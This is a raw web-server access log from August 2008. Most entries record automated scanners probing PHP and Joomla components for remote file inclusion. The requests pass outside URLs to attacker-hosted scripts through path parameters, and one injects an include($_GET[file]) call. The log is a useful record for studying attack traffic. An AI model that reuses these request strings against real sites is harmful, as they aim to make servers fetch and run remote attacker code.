118.129.166.13 - - [21/Aug/2008:19:01:23 -0500] "GET /logs/access_log.1214179200/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
89.108.67.143 - - [21/Aug/2008:19:02:31 -0500] "GET /logs/index1.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.108.67.143 - - [21/Aug/2008:19:02:31 -0500] "GET /index1.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
80.93.62.114 - - [21/Aug/2008:19:02:33 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
80.93.62.114 - - [21/Aug/2008:19:02:34 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
80.93.62.114 - - [21/Aug/2008:19:02:34 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
80.93.62.114 - - [21/Aug/2008:19:03:20 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
89.108.67.143 - - [21/Aug/2008:19:03:57 -0500] "GET /logs/index2.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.108.67.143 - - [21/Aug/2008:19:03:57 -0500] "GET /index2.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
74.6.22.119 - - [21/Aug/2008:19:12:41 -0500] "GET /logs/access_log.1167004800 HTTP/1.0" 200 162927 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.169.137.253 - - [21/Aug/2008:19:13:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:19:13:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:19:14:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:19:14:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
74.6.22.119 - - [21/Aug/2008:19:15:13 -0500] "GET /logs/access_log.1163894400 HTTP/1.0" 200 162626 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.67.143 - - [21/Aug/2008:19:15:37 -0500] "GET /logs/access_log.1205366400/index1.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
89.108.67.143 - - [21/Aug/2008:19:15:37 -0500] "GET /index1.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
89.108.67.143 - - [21/Aug/2008:19:15:37 -0500] "GET /logs/index1.php?pg=http://www.wintaktrading.com/backup/testeinbox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
119.63.194.102 - - [21/Aug/2008:19:15:51 -0500] "GET /logs/access_log.1204761600 HTTP/1.1" 304 - "-""Baiduspider+(+http://help.baidu.jp/system/05.html)"
81.169.137.253 - - [21/Aug/2008:19:17:00 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:19:17:06 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
198.66.222.121 - - [21/Aug/2008:19:18:45 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
198.66.222.121 - - [21/Aug/2008:19:18:45 -0500] "GET ///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
198.66.222.121 - - [21/Aug/2008:19:18:45 -0500] "GET /logs///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
198.66.222.121 - - [21/Aug/2008:19:18:47 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
198.66.222.121 - - [21/Aug/2008:19:18:47 -0500] "GET ///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
198.66.222.121 - - [21/Aug/2008:19:18:47 -0500] "GET /logs///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
87.106.101.71 - - [21/Aug/2008:19:18:59 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
87.106.101.71 - - [21/Aug/2008:19:18:59 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
203.211.131.132 - - [21/Aug/2008:19:19:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:19:19:10 -0500] "GET //skin/zero_vote/error.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
201.130.79.130 - - [21/Aug/2008:19:20:02 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
201.130.79.130 - - [21/Aug/2008:19:20:02 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
208.115.34.17 - - [21/Aug/2008:19:20:29 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:19:20:29 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
198.66.222.121 - - [21/Aug/2008:19:20:43 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
198.66.222.121 - - [21/Aug/2008:19:20:43 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=ttp://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
208.83.209.18 - - [21/Aug/2008:19:22:05 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
208.83.209.18 - - [21/Aug/2008:19:22:05 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
65.254.61.170 - - [21/Aug/2008:19:23:32 -0500] "GET /logs/index.php?go=http://warsector.ru/access2006.log??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
65.254.61.170 - - [21/Aug/2008:19:23:32 -0500] "GET /index.php?go=http://warsector.ru/access2006.log??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
80.67.19.125 - - [21/Aug/2008:19:25:13 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.808"
80.67.19.125 - - [21/Aug/2008:19:25:14 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
89.111.176.96 - - [21/Aug/2008:19:27:33 -0500] "GET /logs/access_log.1199577600/components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
89.111.176.96 - - [21/Aug/2008:19:27:33 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.111.176.96 - - [21/Aug/2008:19:27:34 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
80.67.19.125 - - [21/Aug/2008:19:28:43 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.808"
80.67.19.125 - - [21/Aug/2008:19:28:46 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
89.47.236.56 - - [21/Aug/2008:19:29:18 -0500] "GET /?sourcedir=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.47.236.56 - - [21/Aug/2008:19:29:18 -0500] "GET /logs/access_log.1215043200/?sourcedir=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.47.236.56 - - [21/Aug/2008:19:29:20 -0500] "GET /logs/?sourcedir=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 200 96216 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.111.176.96 - - [21/Aug/2008:19:30:28 -0500] "GET /logs/access_log.1214179200/components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:19:30:33 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:19:30:33 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:19:31:54 -0500] "GET /logs//include/write.php?dir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:19:32:27 -0500] "GET //include/write.php?dir=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
206.220.64.3 - - [21/Aug/2008:19:32:59 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
206.220.64.3 - - [21/Aug/2008:19:32:59 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
203.211.131.132 - - [21/Aug/2008:19:35:07 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:19:35:08 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.126.254.80 - - [21/Aug/2008:19:38:37 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:19:38:38 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.76"
78.110.50.122 - - [21/Aug/2008:19:38:52 -0500] "GET /logs/access_log.1214524800/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
78.110.50.122 - - [21/Aug/2008:19:38:53 -0500] "GET /excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
78.110.50.122 - - [21/Aug/2008:19:38:53 -0500] "GET /logs/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.126.254.80 - - [21/Aug/2008:19:39:35 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:19:39:36 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
62.231.161.4 - - [21/Aug/2008:19:40:51 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:40:51 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.64"
87.238.163.18 - - [21/Aug/2008:19:41:00 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:19:41:01 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
125.24.42.126 - - [21/Aug/2008:19:42:16 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
125.24.42.126 - - [21/Aug/2008:19:42:19 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
125.24.42.126 - - [21/Aug/2008:19:42:22 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
125.24.42.126 - - [21/Aug/2008:19:42:28 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
202.181.99.47 - - [21/Aug/2008:19:43:50 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://utilz.info/a4? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:19:43:51 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://utilz.info/a4? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.211.131.132 - - [21/Aug/2008:19:44:16 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:19:44:55 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
62.141.58.16 - - [21/Aug/2008:19:46:34 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.141.58.16 - - [21/Aug/2008:19:46:34 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
202.181.99.47 - - [21/Aug/2008:19:47:04 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:19:47:04 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:19:47:42 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:47:42 -0500] "GET //?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.64"
125.24.42.126 - - [21/Aug/2008:19:48:19 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
125.24.42.126 - - [21/Aug/2008:19:48:22 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
202.181.99.47 - - [21/Aug/2008:19:49:24 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://utilz.info/a4? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:19:49:24 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:19:49:26 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:49:27 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:49:36 -0500] "GET /logs/?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 96216 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:49:37 -0500] "GET /?sourcedir=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.64"
208.115.34.17 - - [21/Aug/2008:19:49:40 -0500] "GET /logs/access_log.1214524800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:19:49:40 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:19:49:40 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
77.221.130.9 - - [21/Aug/2008:19:49:48 -0500] "GET /logs/access_log.1214438400//bemarket/postscript/postscript.php?p_mode=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:19:49:48 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:19:49:48 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
74.6.22.119 - - [21/Aug/2008:19:50:46 -0500] "GET /logs/access_log.1168732800 HTTP/1.0" 200 200685 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.181.99.47 - - [21/Aug/2008:19:51:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://utilz.info/a4? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:19:51:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://utilz.info/a4? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:19:53:49 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:19:53:50 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.98.250.45 - - [21/Aug/2008:19:54:12 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:19:54:15 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:19:54:42 -0500] "GET /phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
77.221.130.12 - - [21/Aug/2008:19:54:54 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://isladevieques.net/images/bhl? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
77.221.130.12 - - [21/Aug/2008:19:54:55 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://isladevieques.net/images/bhl? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
210.245.166.92 - - [21/Aug/2008:19:55:07 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.245.166.92 - - [21/Aug/2008:19:55:07 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
66.115.174.234 - - [21/Aug/2008:19:55:37 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:19:55:37 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:19:55:41 -0500] "GET /logs/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:55:41 -0500] "GET /errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
208.115.34.17 - - [21/Aug/2008:19:55:53 -0500] "GET /logs/access_log.1214438400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.813"
64.185.237.191 - - [21/Aug/2008:19:56:05 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:19:56:06 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:19:58:19 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:19:58:19 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:19:58:54 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:19:58:54 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
208.115.34.17 - - [21/Aug/2008:19:59:05 -0500] "GET /logs/access_log.1203638400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:19:59:06 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
208.115.34.17 - - [21/Aug/2008:19:59:07 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.231.161.4 - - [21/Aug/2008:19:59:17 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:59:17 -0500] "GET //?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:19:59:20 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.64"
208.115.34.17 - - [21/Aug/2008:19:59:32 -0500] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
